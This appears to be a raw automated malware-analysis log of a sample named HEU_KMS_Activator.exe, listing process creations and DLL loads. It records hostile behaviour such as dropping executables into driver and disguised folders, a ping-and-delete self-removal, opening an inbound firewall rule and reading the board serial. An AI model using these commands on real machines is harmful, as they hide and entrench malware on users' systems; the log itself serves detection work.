Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [Temp] >%windir%\ScriptTemp.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess created: C:\Windows\System32\drivers\DvLayout.exe "C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: C:\Windows\System32\drivers\DvLayout.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /h off
Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Temp=_temp07242019502489 >>%windir%\ScriptTemp.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\drivers\DvLayout.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe "C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumber
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\_temp07242019502489\7Z.EXE C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489
Source: C:\Windows\_temp07242019502489\7Z.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo [Direction] >%windir%\_temp07242019502489\ScriptDir.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Dir=C:\Users\user\AppData\Local\Temp >>%windir%\_temp07242019502489\ScriptDir.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Name=HEU_KMS_Activator.exe >>%windir%\_temp07242019502489\ScriptDir.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\_temp07242019502489\kms_x64.exe C:\Windows\_temp07242019502489\kms_x64.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess created: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exeJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess created: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe C:\Users\user~1\AppData\Local\Temp\HEU_KMS_Activator.exeJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess created: C:\Windows\System32\drivers\DvLayout.exe "C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" HookJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumberJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [Temp] >%windir%\ScriptTemp.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Temp=_temp07242019502489 >>%windir%\ScriptTemp.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\_temp07242019502489\7Z.EXE C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo [Direction] >%windir%\_temp07242019502489\ScriptDir.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Dir=C:\Users\user\AppData\Local\Temp >>%windir%\_temp07242019502489\ScriptDir.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Name=HEU_KMS_Activator.exe >>%windir%\_temp07242019502489\ScriptDir.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\_temp07242019502489\kms_x64.exe C:\Windows\_temp07242019502489\kms_x64.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1Jump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /h offJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe "C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -installJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: msiso.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: edputil.dllJump to behavior
